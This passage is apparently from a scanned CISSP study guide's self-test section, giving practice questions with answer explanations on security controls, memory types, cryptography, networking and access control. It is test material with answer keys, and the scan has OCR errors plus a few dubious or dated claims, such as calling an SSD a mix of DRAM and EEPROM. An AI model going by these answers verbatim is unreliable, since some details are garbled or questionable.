D. Standards are recommendations and guidelines are optional 

Correct Answer and Explanation: C. Answer C is correct; Standards are require- 
ments (mandatory) and guidelines are recommendations. 
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Incorrect Answers and Explanations: A, B, and D. Answers A, B, and D are 
incorrect. For A, Guidelines are recommendations (compulsory and mandatory are 
synonyms). Answer B has the recommendations and requirements flipped. For D, 
standards are mandatory, not recommendations. 

1 1 . An attacker sees a building is protected by security guards, and attacks a 
building next door with no guards. What control combination are the security 
guards? 

A. Physical/Compensating 

B. Physical/Detective 

C. Physical/Deterrent 

D. Physical/Preventive 

Correct Answer and Explanation: C. Answer C is correct; the guards deterred the 
attack. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. In a different scenario a guard could be any of these, but all are incorrect 
given the question. Compensating controls compensate for a weakness in another 
control. Detective controls detect a successful attack during or after it has occurred. 
Preventive controls prevent successful attacks. 

1 2. Which canon of The (ISC) 2 ® Code of Ethics should be considered the most 
important? 

A. Protect society, the commonwealth, and the infrastructure 

B. Advance and protect the profession 

C. Act honorably, honestly, justly, responsibly, and legally 

D. Provide diligent and competent service to principals 

Correct Answer and Explanation: A. Answer A is correct; to protect society, the 
commonwealth, and the infrastructure is the first canon, and is thus the most impor- 
tant of the four canons of The (ISC) 2 ® Code of Ethics 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. The canons of The (ISC) 2 ® Code of Ethics are presented in order of 
importance. The second canon requires the security professional to act honorably, 
honestly, justly, responsibly, and legally. The third mandates that professionals 
provide diligent and competent service to principals. The final, and therefore least 
important canon, wants professionals to advance and protect the profession. 

1 3. Which doctrine would likely allow for duplication of copyrighted material for 
research purposes without the consent of the copyright holder? 

A. First sale 

B. Fair use 

C. First privilege 

D. Free dilution 

Correct Answer and Explanation: B. Answer B is correct; fair use limits 
the rights of the copyright holder by making some exceptions to the copyright 
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holder’s exclusive monopoly on the intellectual property in question. There is no 
explicit rule as to how much material can be duplicated and still constitute 
fair use. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. First sale allows a legitimate purchaser of copyrighted material the right 
to sell the material to another party. First privilege and free dilution are both made 
up terms. 

1 4. Which type of intellectual property is focused on maintaining brand 
recognition? 

A. Patent 

B. Trade Secrets 

C. Copyright 

D. Trademark 

Correct Answer and Explanation: D. Answer D is correct; trademarks are 
intended to allow an organization to create a recognizable brand associated with the 
company’s goods or services. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are 
incorrect. Patents are associated with inventions. Trade secrets are those materials 
that an organization protects in order to maintain their competitive stance in the 
marketplace. Copyright covers the form of expression in creative works. 

1 5. Drag and drop: Identify all objects listed below. Drag and drop all objects from 
left to right. 


Possible Answers Correct Answers 


/■ \ 

Readme.txt file 



Running login 
process 


v / 

/ \ 



Authenticated 

user 


FIGURE SELFTEST. 1 Drag and Drop 
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Correct Answer and Explanation: Files, database tables and tax forms are example 
of objects, so they should be dragged to the right. 


Possible Answers Correct Answers 


Running login 
process 


Authenticated 

user 


Readme.txt file 


Database Table 


1099 Tax Form 


FIGURE SELFTEST.2 Drag and Drop Answer 


Incorrect Answers and Explanations: A running process and a user are examples 
of subjects. 


CHAPTER 3: DOMAIN 2: ASSET SECURITY 

1 . What type of memory is used often for CPU registers? 

A. DRAM 

B. Firmware 

C. ROM 

D. SRAM 

Correct Answer and Explanation: D. Answer D is correct; SRAM (Static Random 
Access Memory is fast and expensive, often used for cache memory including CPU 
registers). 

Incorrect Answers and Explanations: A, B, and C. Answers A, B. and C are 
incorrect. DRAM is slower and less expensive than SRAM, often used as main 
RAM. Firmware is a technology used by PLDs such as EEPROMs. Read-Only 
Memory is a type of Firmware, providing nonvolatile memory for uses such as the 
BIOS. 
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2 . What type of firmware is erased via ultraviolet light? 

A. EPROM 

B. EEPROM 

C. Flash memory 

D. PROM 

Correct Answer and Explanation: A. Answer A is correct; EPROM (Erasable 
Programmable Read Only Memory) is erased by exposure to ultraviolet light. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. EEPROMs (Electrically Erasable Programmable Read Only Memory) are 
erased electronically, via flashing programs. Flash memory is a type of EEPROM, 
also erased electronically. PROM (Programmable Read Only Memory) cannot be 
erased. 

3 . What describes the process of determining which portions of a standard will be 

employed by an organization? 

A. Baselines 

B. Policies 

C. Scoping 

D. Tailoring 

Correct Answer and Explanation: C. Answer C is correct; scoping is the process 
of determining which portions of a standard will be employed by an organization. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B, and D are 
incorrect. Baselines are uniform ways to implement a safeguard, administrative 
control. Policies are high-level management directives. Tailoring is the process of 
customizing a standard for an organization. 

4 . What nonvolatile memory normally stores the operating system kernel on an 

IBM PC-compatible system? 

A. Disk 

B. Firmware 

C. RAM 

D. ROM 

Correct Answer and Explanation: A. Answer A is correct; the kernel is stored on 
disk, and is loaded into volatile memory by the BIOS. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. ROM (including firmware) is nonvolatile memory that stores the BIOS. 
RAM is volatile memory that holds the kernel after the system has booted. 

5 . What was ISO 17799 renamed as? 

A. BS 7799-1 

B. ISO 27000 

C. ISO 27001 

D. ISO 27002 
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Correct Answer and Explanation: D. Answer D is correct; ISO 17799 was 
renamed as ISO 27002. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are 
incorrect. BS 7799-1 was the precursor to ISO 17799. ISO 27000 is a series of 
information security standards documents. ISO 27001 is another ISO 27000-series 
document designed to support auditing. 

6 . Which of the following describes a duty of the Data Owner? 

A. Patch systems 

B. Report suspicious activity 

C. Ensure their files are backed up 

D. Ensure data has proper security labels 

Correct Answer and Explanation: D. Answer D is correct; the Data Owner 
ensures that data has proper security labels. 

Incorrect Answers and Explanations: A, B , and C. Answers A , B. and C are 
incorrect. Custodians patch systems. Users should be aware and report suspicious 
activity. Ensuring hies are backed up is a weaker answer for a Data Owner duty, 
used to confuse the Data Owner with “the owner of the hie” on a discretionary 
access control system. 

7. Which control framework has 34 processes across four domains? 

A. COSO 

B. COBIT 

C. ITIL 

D. OCTAVE 

Correct Answer and Explanation: B. Answer B is correct; COBIT has 34 Infor- 
mation Technology processes across the four domains. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. All are audit or control frameworks, but only COBIT has 34 processes 
across four domains. 

8. Which phase of OCTAVE identihes vulnerabilities and evaluates safeguards? 

A. Phase 1 

B. Phase 2 

C. Phase 3 

D. Phase 4 

Correct Answer and Explanation: B. Answer B is correct; Phase 2 identihes 
vulnerabilities and evaluates safeguards. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Phase 1 identihes staff knowledge, assets, and threats. Phase 3 conducts 
the Risk Analysis and develops the risk mitigation strategy. There is no Phase 4 in 
OCTAVE. 
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9. Which of the following is the best method for securely removing data from a 

Solid State Drive that is not physically damaged? 

A. ATA secure erase 

B. Bit-level overwrite 

C. Degaussing 

D. File shredding 

Correct Answer and Explanation: A. Answer A is correct; ATA Secure erase will 
reliably remove data from an undamaged Solid State Drive (SSD). 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. A bit-level overwrite will not reliably destroy all data on a Solid State 
Drive. Degaussing has no effect on non-magnetic media. File shredding (overwrit- 
ing a file’s contents before deleting) will also not reliably destroy all data on a Solid 
State Drive. 

1 0. The release of what type of classified data could lead to “exceptionally grave 

damage to the national security”? 

A. Confidential 

B. Secret 

C. Sensitive but Unclassified (SBU) 

D. Top Secret 

Correct Answer and Explanation: D. Answer/) is correct; the release of top secret 
data could lead to “exceptionally grave damage to the national security.” 

Incorrect Answers and Explanations: A, B, and C. Answers A , B, and C are 
incorrect. The release of confidential data could lead to “damage to the national 
security.” The release of secret data could lead to “serious damage to the national 
security.” The release of SBU data is not a matter of national security, but is 
important for other reasons, including protecting individual’s PII. 

1 1 . A company outsources payroll services to a 3rd party company. Which of the 

following roles most likely applies to the 3rd party payroll company? 

A. Data controller 

B. Data hander 

C. Data owner 

D. Data processor 

Correct Answer and Explanation: D. Answer D is correct; a 3 rd party payroll 
company is an example of a data processor. 

Incorrect Answers and Explanations: A, /?, and C. Answers A, B , and C are 
incorrect. A data controller is someone who creates PII, such as an HR depart- 
ment. “Data handler” is not a formal term, and is a distractor answer. A data 
owner is a management employee responsible for assuring that specific data is 
protected. 
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1 2. Which managerial role is responsible for the actual computers that house data, 
including the security of hardware and software configurations? 

A. Custodian 

B. Data owner 

C. Mission owner 

D. System owner 

Correct Answer and Explanation: D. Answer D is correct; a system owner is 
responsible for the actual computers that house data, including the security of hard- 
ware and software configurations. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are 
incorrect. A custodian is a non-manager who provides hands-on protection of assets. 
A data owner is a management employee responsible for assuring that specific data 
is protected. A mission owner is a member of senior management who create the 
information security program and ensure that it is properly staffed, funded, and has 
organizational priority. 

1 3. What method destroys the integrity of magnetic media such as tapes or disk 
drives by exposing them to a strong magnetic field, destroying the integrity of 
the media and the data it contains? 

A. Bit-level overwrite 

B. Degaussing 

C. Destruction 

D. Shredding 

Correct Answer and Explanation: B. Answer B is correct; degaussing destroys 
the integrity of magnetic media such as tapes or disk drives by exposing them 
to a strong magnetic field, destroying the integrity of the media and the data it 
contains. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. A bit-level overwrite removes data by overwriting every sector of a disk. 
Destruction physically destroys data, for example via incineration. Shredding elec- 
tronic data involves overwriting a file’s contents before deleting the file. 

1 4. What type of relatively expensive and fast memory uses small latches called 
“flip-flops” to store bits? 

A. DRAM 

B. EPROM 

C. SRAM 

D. SSD 

Correct Answer and Explanation: C. Answer C is correct; SRAM is relatively 
expensive and fast memory uses small latches called “flip-flops” to store bits. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B, and D are 
incorrect. DRAM is relatively inexpensive memory that uses capacitors. EPROM 
is Erasable Programmable Read Only Memory, memory which may be erased 
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with ultraviolet light. SSD is a Solid State Drive, a combination of DRAM and 
EEPROM. 

1 5. What type of memory stores bits in small capacitors (like small batteries)? 

A. DRAM 

B. EPROM 

C. SRAM 

D. SSD 

Correct Answer and Explanation: A. Answer A is correct; DRAM stores bits in 
small capacitors (like small batteries). 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. EPROM is Erasable Programmable Read Only Memory, memory which 
may be erased with ultraviolet light. SRAM is relatively expensive and fast memory 
uses small latches called “flip-flops” to store bits. SSD is a Solid State Drive, a com- 
bination of DRAM and EEPROM. 


CHAPTER 4: DOMAIN 3: SECURITY ENGINEERING 

1 . What type of sprinkler system would be best for an art gallery? 

A. Wet pipe 

B. Dry pipe 

C. Deluge 

D. Pre-action 

Correct Answer and Explanation: D. Answer D is correct; pre-action sprinkler 
systems lower the chance of accidental discharge by requiring two separate triggers 
to deploy: the sprinkler head must open and the fire alarm must trigger. These sys- 
tems lower the risk of false alarms, typically used in areas where water would cause 
expensive damage. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B , and C are incor- 
rect; all release water after a single trigger. This increases the chance of a false alarm 
causing expensive damage. 

2. What is the primary drawback to using dogs as a perimeter control? 

A. Training 

B. Cost 

C. Liability 

D. Appearance 

Correct Answer and Explanation: C. Answer C is correct; liability is the primary 
drawback to using dogs as a security control. Dogs may mistakenly attack a person 
who accidentally enters a controlled area. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B, and D are incor- 
rect; they are all potentially valid issues, but are lesser concerns than liability and safety. 
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3 . The RSA algorithm is based on which one-way function? 

A. Elliptic curves 

B. Discrete logarithm 

C. Frequency distribution 

D. Factoring composite numbers into their primes 

Correct Answer and Explanation: D. Answer D is correct; RSA is based on the 
difficulty of factoring large composite numbers into their primes. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are 
incorrect. Elliptic curve and discrete logarithms are other types of one-way functions. 
Frequency distribution is a way to perform cryptanalysis. 

4 . Which of the following is true for digital signatures? 

A. The sender encrypts the hash with a public key 

B. The sender encrypts the hash with a private key 

C. The sender encrypts the plaintext with a public key 

D. The sender encrypts the plaintext with a private key 

Correct Answer and Explanation: B. Answer B is correct; the sender generates a 
hash of the plaintext and encrypts the hash with a private key. The recipient decrypts 
the hash with a public key. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. The sender encrypts the hash with the private key, not public. The plaintext 
is hashed, and not encrypted. 

5 . Which algorithm should you use for a low-power device that must employ 

digital signatures? 

A. AES 

B. RSA 

C. ECC 

D. ElGamal 

Correct Answer and Explanation: C. Answer C is correct; digital signatures 
require asymmetric encryption. ECC is the strongest asymmetric algorithm per bit of 
key length. This allows shorter key lengths that require less CPU resources. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B, and D are 
incorrect. AES is a symmetric cipher; symmetric ciphers are not used in digital 
signatures. RSA is based on factoring composite numbers into their primes, and 
ElGamal is based on discrete logarithms. Both methods provide roughly the same 
strength per bit and are far weaker per bit than ECC. 

6 . What model should you use if you are primarily concerned with confidentiality 

of information? 

A. Bell-LaPadula 

B. Biba 

C. Clark- Wilson 

D. Confidentiality Model 
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Correct Answer and Explanation: A. Answer A is correct; the Bell-LaPadula 
model protects confidentiality of data. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. Biba and Clark- Wilson are integrity models. There is no “Confidentiality 
Model.” 

7 . On Intel X86 systems, the kernel normally runs in which CPU ring? 

A. Ring 0 

B. Ring 1 

C. Ring 2 

D. Ring 3 

Correct Answer and Explanation: A. Answer A is correct; the kernel normally 
runs in ring 0, the most trusted part of the system. 

Incorrect Answers and Explanations: B, C, and D. Answers B , C, and D 
are incorrect. Ring 1 is theoretically used for parts of the OS that do not fit in 
ring 0. Ring 2 is theoretically used for device drivers. Ring 3 is used for user 
applications. 

8 . Which type of cloud service level would Linux hosting be offered under? 

A. IaaS 

B. IDaaS 

C. PaaS 

D. SaaS 

Correct Answer and Explanation: A. Answer A is correct; IaaS (Infrastructure 
as a Service) provides an entire virtualized operating system, which the customer 
configures from the OS on up. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. IDaaS (Identity as a Service) is also called cloud identity, allows organiza- 
tions to leverage cloud service for identity management. PaaS (Platform as a Service) 
provides a pre-configured operating system, and the customer configures the appli- 
cations. SaaS (Software as a Service) is completely configured, from the operating 
system to applications, and the customer simply uses the application. 

9 . You are surfing the Web via a wireless network. Your wireless connection 

becomes unreliable, so you plug into a wired network to continue surfing. 

While you changed physical networks, your browser required no change. What 

security feature allows this? 

A. Abstraction 

B. Hardware Segmentation 

C. Layering 

D. Process Isolation 

Correct Answer and Explanation: C. Answer C is correct; Layering means 
a change in one layer (hardware) has no direct effect on a nonadjacent layer 
(application). 
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Incorrect Answers and Explanations: A, B , and D. Answers A, B , and D are 
incorrect. Abstraction hides unnecessary details from the user, which is related to 
(but different) from layering. Hardware segmentation provides dedicated hard- 
ware or portions of hardware to specific security domains. Process isolation pre- 
vents one process from affecting the confidentiality, integrity or availability of 
another. 

1 0. A criminal deduces that an organization is holding an offsite meeting and has 

few people in the building, based on the low traffic volume to and from the 

parking lot, and uses the opportunity to break into the building to steal laptops. 

What type of attack has been launched? 

A. Aggregation 

B. Emanations 

C. Inference 

D. Maintenance Hook 

Correct Answer and Explanation: C. Answer C is correct; Inference requires 
an attacker to “fill in the blanks,” and deduce sensitive information from public 
information. 

Incorrect Answers and Explanations: A, B, and D. Answers A , B. and D are 
incorrect. Aggregation is a mathematical operation where all questions are asked 
and all answers are received: there is no deduction required. Emanations are energy 
broadcast from electronic equipment. Maintenance Hooks are system maintenance 
backdoors left by vendors. 

1 1 . EMI issues such as crosstalk primarily impact which aspect of security? 

A. Confidentiality 

B. Integrity 

C. Availability 

D. Authentication 

Correct Answer and Explanation: B. Answer B is correct; while EMI issues such 
as crosstalk could impact all aspects listed, it most commonly impacts integrity. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect; confidentiality can be impacted (such as hearing another conversation on 
a voice phone call), and in extreme cases availability and authentication could be 
impacted (where crosstalk is so severe as to stop systems from functioning). These 
scenarios are far less common than simple integrity violation caused by EMI issues 
such as crosstalk. 

1 2. What is the most important goal of fire suppression systems? 

A. Preservation of critical data 

B. Safety of personnel 

C. Building integrity 

D. Quickly extinguishing a fire 
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Correct Answer and Explanation: B. Answer B is correct; personnel safety is the 
paramount concern of the physical (environmental) security domain. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect; all are valid concerns, but less important than safety. Data protection is 
always a secondary concern to safety; this is why water is the recommended fire 
extinguishing agent. Building integrity and quickly extinguishing the fire are also 
important and impact safety, but safety itself is the goal, and thus a stronger answer. 
The integrity of an empty building is a lesser concern, for example, and while the 
speed of extinguishing a fire is important, the safety of personnel who must evacu- 
ate is a more important concern. The fastest way to extinguish a fire is to starve it of 
oxygen, which would be deadly to people. 

1 3. What type of network cable should be used to eliminate the chance of 

crosstalk? 

A. Shielded twisted pair 

B. Unshielded twisted pair 

C. Coaxial 

D. Fiber optic 

Correct Answer and Explanation: D. Answer D is correct; fiber optic cable uses 
light instead of electricity and is not subject to electro-magnetic interference (EMI) 
issues such as crosstalk. 

Incorrect Answers and Explanations: A, B. and C. Answers A, B, and C are incor- 
rect. Unshielded twisted pair is susceptible to EMI when improperly routed. Shielded 
twisted pair and coaxial cable are better choices for avoiding crosstalk, but they still 
carry electricity, and could have EMI issues under certain circumstances. 

1 4. Nonrepudiation is best described as what? 

A. Proving a user performed a transaction 

B. Proving a transaction did not change 

C. Authenticating a transaction 

D. Proving a user performed a transaction that did not change 

Correct Answer and Explanation: D. Answer D is correct; nonrepudiation is 
proof that a user performed a transaction and proof that it did not change. 

Incorrect Answers and Explanations: A, B. and C. Answers A, B, and C are incor- 
rect. Proving a transaction did not change is one half of nonrepudiation; proving a 
user performed a transaction is the other half. Nonrepudiation requires both. Authen- 
ticating a transaction is another way of saying a user performed the transaction, and 
is also one half of nonrepudiation. 

1 5. Hotspot: you receive the following signed email from Roy Batty. You 

determine that the email is not authentic, or has changed since it was sent. 

Click on the locally-generated message digest that proves the email lacks non- 
repudiation. 
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From: Roy Batty 
To: Rick Deckard 
Subject: Death 

I've seen things you people 
wouldn't believe. Attack ships on 
fire off the shoulder of Orion. 


V 


SHA-1 


V 



e24a73bd98 
0e71af 7c8b 
6d4e48da04 
40 6d6c8e8f 

6e2903d23a 
b37a9a4872 
225a588c21 
d2d!0f 1135 



Compare 

the hashes . 


FIGURE SELFTEST.3 Hotspot 


Correct Answer and Explanation: The output of a hash algorithm such as SHA-1 
is called a message digest. The message digest on the top right of the diagram below 
is the locally-generated hash that does not match the original hash received by 
decrypting the digital signature with the creator’s public key. 



Compare \ 
the hashes / 


FIGURE SELFTEST. 4 Hotspot Answer 


Incorrect Answers and Explanations: the other clickable areas of the hotspot are 
not locally-generated hashes that proves the email lacks non-repudiation. 


CHAPTER 5: DOMAIN 4: COMMUNICATION AND NETWORK 
SECURITY 

1 . Which protocol should be used for an audio streaming server, where some loss 
is acceptable? 

A. IP 

B. ICMP 

C. TCP 

D. UDP 
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Correct Answer and Explanation: D. Answer I) is correct; UDP is used for high- 
speed applications that can handle some loss. 

Incorrect Answers and Explanations: A, B, and C. Answers A , B. and C are 
incorrect. IP is a carrier protocol, which would require a higher-layer protocol such 
as UDP to support an application. ICMP is a helper protocol, and does not carry 
application data. TCP is a reliable and slow protocol, not the best choice when 
speed is required, and loss is OK. 

2 . What network technology uses fixed-length cells to carry data? 

A. ARCNET 

B. ATM 

C. Ethernet 

D. FDD1 

Correct Answer and Explanation: B. Answer B is correct; ATM is a networking 
technology that uses 53 byte fixed-length cells. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D 
are incorrect. ARCNET passes tokens. Ethernet uses frames. FDDI also uses 
tokens. 

3 . Secure Shell (SSH) servers listen on what port and protocol? 

A. TCP port 20 

B. TCP port 21 

C. TCP port 22 

D. TCP port 23 

Correct Answer and Explanation: C. Answer C is correct; SSH servers listen on 
TCP port 22. 

Incorrect Answers and Explanations: A , B, and D. Answers A, B. and D are 
incorrect. FTP uses TCP ports 20 and 21. Telnet uses TCP port 23. 

4 . What network cable type can transmit the most data at the longest distance? 

A. Coaxial 

B. Fiber Optic 

C. Shielded Twisted Pair (STP) 

D. Unshielded Twisted Pair (UTP) 

Correct Answer and Explanation: B. Answer B is correct; Fiber Optic Network 
Cable can transmit the most data the furthest. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Among the four answers, STP and UTP can transmit the shortest distance. 
Coaxial network cable can transmit more data further than twisted pair cabling, but 
not nearly as far as fiber. 

5 . Which device operates at Layer 2 of the OSI model? 

A. Hub 

B. Firewall 
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C. Switch 

D. Router 

Correct Answer and Explanation: C. Answer C is correct; A switch operates at 
layer 2 (data link layer) of the OSI model. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. A hub operates at layer 1 (physical). Packet filter and stateful firewalls 
operate at layers 3 and 4, Circuit-Level Proxies (such as SOCKS) operate up to 
layer 5 (session), and application-layer proxies operate up to layer 7 (application). 
Routers operate at layer 3 (network). 

6 . What are the names of the OSI model, in order from bottom to top? 

A. Physical, Data Link, Transport, Network, Session, Presentation, 
Application 

B. Physical, Network, Data Link, Transport, Session, Presentation, 
Application 

C. Physical, Data Link, Network, Transport, Session, Presentation, 
Application 

D. Physical, Data Link, Network, Transport, Presentation, Session, 
Application 

Correct Answer and Explanation: C. Answer C is correct; The OSI model from 
bottom to top is: Physical, Data Link, Network, Transport, Session, Presentation, and 
Application. Remember “Please Do Not Throw Sausage Pizza Away” as a useful 
mnemonic to remember this. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B, and D are 
incorrect. All are in the wrong order. 

7. Which of the following authentication protocols uses a 3-way authentication 

handshake? 

A. CHAP 

B. EAP 

C. Kerberos 

D. PAP 

Correct Answer and Explanation: A. Answer A is correct; CHAP (Challenge 
Handshake Authentication Protocol) uses a 3-way authentication handshake. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. EAP is the Extensible Authentication Protocol, an authentication frame- 
work describing multiple authentication methods. Kerberos is a Single Sign On sys- 
tem that uses tickets. PAP is the Password Authentication Protocol, which is simpler 
(and has less steps) than CHAP. 

8. Restricting Bluetooth device discovery relies on the secrecy of what? 

A. MAC Address 

B. Symmetric key 
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C. Private Key 

D. Public Key 

Correct Answer and Explanation: A. Answer A is correct; Restricting Bluetooth 
device discovery relies on the secrecy of the 48-bit Bluetooth MAC address. 

Incorrect Answers and Explanations: B, C , and D. Answers B , C, and D are 
incorrect. While EO is a symmetric cipher, it is not used to restrict discovery 
(it is used to encrypt data). Public or Private keys are also not used for Bluetooth 
Discovery. 

9. Which wireless security protocol is also known as the RSN (Robust Security 

Network), and implements the full 802.1 li standard? 

A. AES 

B. WEP 

C. WPA 

D. WPA2 

Correct Answer and Explanation: D. Answer/) is correct; WPA2 (Wi-Fi Protected 
Access 2) implements AES and CCMP (Counter Mode CBC MAC Protocol), as 
defined by 802.1 li. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are 
incorrect. AES is part of WPA2, which also includes CCMP, so it is a weaker 
answer than WPA2. WEP is Wired Equivalent Privacy, and older and insecure 
security protocol that should no longer be used. WPA is less secure than WPA2, 
using RC4 and TK1P. 

1 0. Which endpoint security technique is the most likely to prevent a previously 

unknown attack from being successful? 

A. Signature-based antivirus 

B. Host Intrusion Detection Systems (HIDS) 

C. Application Whitelisting 

D. Perimeter firewall 

Correct Answer and Explanation: C. Answer C is correct: Application Whitelist- 
ing is the most likely to be successful of the options listed. 

Incorrect Answers and Explanations: A, B , and D. Answers A, B. and D are all in- 
correct. Signature-based antivirus is most successful at preventing known rather than 
unknown attacks. Host Intrusion Detection Systems (HIDS) do not prevent attacks 
from being successful, but rather can help detect them. A perimeter firewall is not an 
endpoint security product. 

1 1 . Which transmission mode is supported by both HDLC and SDLC? 

A. Asynchronous Balanced Mode (ABM) 

B. Asynchronous Response Mode (ARM) 

C. Normal Balanced Mode (NBM) 

D. Normal Response Mode (NRM) 
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Correct Answer and Explanation: D. Answer D is correct; both HDLC and SDLC 
support Normal Response Mode (NRM), where secondary nodes can transmit when 
given permission by the primary. 

Incorrect Answers and Explanations: A, B, and C. Answers A , B, and C are 
incorrect. HDLC supports Asynchronous Balanced Mode (ABM) and Asynchronous 
Response Mode (ARM), while SDLC does not. There is no such mode as Normal 
Balanced Mode (NBM). 

1 2. What is the most secure type of EAP? 

A. EAP-TLS 

B. EAP-TTLS 

C. LEAP 

D. PEAP 

Correct Answer and Explanation: A. Answer A is correct; EAP-TLS is the most 
secure (and costly) form of EAP because it requires both server and client-side 
certificates. 

Incorrect Answers and Explanations: B , C, and D. Answers B. C, and D are 
incorrect. EAP-TTLS and PEAP are similar and don’t require client-side certificates. 
LEAP is a Cisco-proprietary protocol that does not require client-side certificates, 
and also has fundamental security weaknesses. 

1 3. What WAN Protocol has no error recovery, relying on higher-level protocols 
to provide reliability? 

A. ATM 

B. Frame Relay 

C. SMDS 

D. X.25 

Correct Answer and Explanation: B. Answer B is correct; Frame Relay is a packet 
switched Layer 2 WAN protocol that features no error recovery. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. ATM and SMDS are cell-based WAN protocols that provide error correc- 
tion. X.25 is a packet switched protocol similar to Frame Relay, but X.25 features 
error recovery. 

1 4. What is the most secure type of firewall? 

A. Packet Filter 

B. Stateful Firewall 

C. Circuit-level Proxy Firewall 

D. Application-layer Proxy Firewall 

Correct Answer and Explanation: D. Answer D is correct; application-layer fire- 
walls are the most secure: they have the ability to filter based on OS1 layers three 
through seven. 

Incorrect Answers and Explanations: A, B. and C. Answers A, B, and C are incor- 
rect. All are firewalls. A packet filter is the least secure of the four, due to the lack 
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of state. A stateful firewall is more secure than a packet filter, but its decisions are 
limited to layers 3 and 4. Circuit-level proxy firewalls operate at layer 5, and cannot 
filter based on application-layer data. 

1 5. Accessing an IPv6 network via an IPv4 network is called what? 

A. CIDR 

B. NAT 

C. Translation 

D. Tunneling 

Correct Answer and Explanation: D. Answer D is correct; accessing an IPv6 
network via an IPv4 network is called tunneling. 

Incorrect Answers and Explanations: A, B, and C. Answers A , B, and C are 
incorrect. CIDR is Classless Inter-domain Routing, a way to create flexible subnets. 
NAT is Network Address Translation, which translates one IP address for another. 
Translation is a distracter answer. 


CHAPTER 6: DOMAIN 5: IDENTITY AND ACCESS 
MANAGEMENT 

1 . What type of password cracking attack will always be successful? 

A. Brute Force 

B. Dictionary 

C. Hybrid 

D. Rainbow Table 

Correct Answer and Explanation: A. Answer A is correct; brute force attacks are 
always successful, given enough time. 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are incor- 
rect. Dictionary attacks will only crack passwords that exist in a dictionary or word 
list. Hybrid attacks append, prepend, or alter characters in words from a dictionary. 
A rainbow table uses pre-computed hashes. Not all rainbow tables are complete, and 
rainbow tables are less effective against salted hashes. 

2. What is the difference between password cracking and password guessing? 

A. They are the same 

B. Password guessing attempts to log into the system; password cracking 
attempts to determine a password used to create a hash 

C. Password guessing uses salts; password cracking does not 

D. Password cracking risks account lockout, password guessing does not 

Correct Answer and Explanation: B. Answer B is correct; password cracking relies 
on cracking the hash of a password; password guessing attempts to log into a system. 

Incorrect Answers and Explanations: A, C, and D. A is incorrect: Password guess- 
ing is not the same as password cracking. C is incorrect because salts are a password 
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cracking issue, not a password guessing issue. D is incorrect: password guessing 
risks account lockout. 

3 . Two users on the same system have the same password, but different hashes 

are stored in the /etc/shadow file. What is the most likely reason the hashes are 

different? 

A. The usernames are different, so the hashes will be different 

B. Use of multiple hashing algorithms 

C. Use of rainbow tables 

D. Use of salts 

Correct Answer and Explanation: D. Answer/) is correct; a salt is a random num- 
ber that is hashed along with the user’s password, making it highly unlikely that two 
users with the same password would also have the same hash. 

Incorrect Answers and Explanations: A, B , and C. Answers A, B, and C are incor- 
rect. Different usernames will have no impact on password hashes on most systems. 
The use of multiple hashing algorithms on the same system is possible, but unlikely. 
Rainbow tables are not used to create hashes; they act as database that contains the 
hashed output for most or all possible passwords. 

4 . What authentication method exposes the password in clear text? 

A. CHAP 

B. Kerberos 

C. PAP 

D. SESAME 

Correct Answer and Explanation: C. Answer C is correct; the Password Authen- 
tication Protocol (PAP) exposes the password in plaintext on the network. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. CHAP, Kerberos and SESAME do not expose the clear text password. 

5 . What are the main differences between retina scans and iris scans? 

A. Retina scans are not invasive and iris scans are 

B. Iris scans invade a person’s privacy and retina scans do not 

C. Iris scans change depending on the person’s health, retina scans are stable 

D. Retina scans change depending on the person’s health, iris scans are stable 

Correct Answer and Explanation: D. D is the correct answer because the blood 
vessels in the retina may change depending on certain health conditions. 

Incorrect Answers and Explanations: A, B, and C. A is incorrect because Retina 
scans are invasive — they can relay user health information. B is incorrect because 
Iris scans are not invasive. C is incorrect because Iris scans remain (comparatively) 
stable regarding the general health of the user attempting access. 

6 . What is the most important decision an organization needs to make when 

implementing Role Based Access Control (RBAC)? 

A. Each user’s security clearance needs to be finalized 

B. The roles users have on the system needs to be clearly defined 
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C. Users’ data needs to be clearly labeled 

D. Users must be segregated from one another on the IT system to prevent 
spillage of sensitive data 

Correct Answer and Explanation: B. B is the correct answer because in Role 
Based Access Control (RBAC), users’ roles must be clearly defined so access to data 
based upon those roles can be limited according to organization policy. 

Incorrect Answers and Explanations: A, C, and D. Answer A is incorrect because 
in RBAC user’s clearances are not considered. Answer C is incorrect because MAC 
labels every object and compares it to a subject’s clearance, not RBAC. Answer D is 
